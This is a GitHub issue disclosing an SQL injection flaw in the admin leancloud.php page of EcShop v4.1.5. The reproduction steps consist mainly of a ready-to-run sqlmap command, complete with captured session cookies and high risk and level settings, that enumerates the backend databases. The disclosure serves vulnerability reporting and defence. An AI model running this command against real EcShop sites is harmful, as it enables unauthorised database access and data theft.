Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

EcShop v4.1.5 SQL injection vulnerability #1

Open
xhcccan opened this issue Sep 24, 2023 · 0 comments
Open

EcShop v4.1.5 SQL injection vulnerability #1

xhcccan opened this issue Sep 24, 2023 · 0 comments

Comments

@xhcccan
Copy link
Owner

xhcccan commented Sep 24, 2023
edited
Loading

  1. First log in to the backend, then visit the page below and use burp to capture the packet and obtain the corresponding cookie.

/ECShop_V4.1.5/source/ecshop/admin/leancloud.php?id=123

Note: The cookie must be the following key-value pair. If one item is missing, it means that the correct package is not captured or it must be reconfigured.
2. Use sqlmap for injection testing, pay attention to replace the number in --cookie with the actual cookie, and finally obtain the data successfully.
sqlmap -u "http://172.16.214.182/ECShop_V4.1.5/source/ecshop/admin/leancloud.php?id=123" --data "act=resend" -p "id" --skip "act,cookie,user-agent,referer,host" --risk 3 --level 5 --dbms mysql --cookie "loginNum=1; ECS_LastCheckOrder=Thu%2C%2028%20Apr%202022%2013%3A16%3A49%20GMT; PHPSESSID=ebtmgof8q3bto0ai088fsvl4bh; ECS_ID=18d636b4644873c4fdb46cf3c4c2b135a912706e; ECS[visit_times]=1; ECSCP_ID=378bf619d7c9c9df588c937be89e20acd56e0821; Hm_lvt_154183a478f900f0163b2141ac4416a5=1651151808; Hm_lpvt_154183a478f900f0163b2141ac4416a5=1651151808" --dbs --flush-session --batch --random-agent

333
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@xhcccan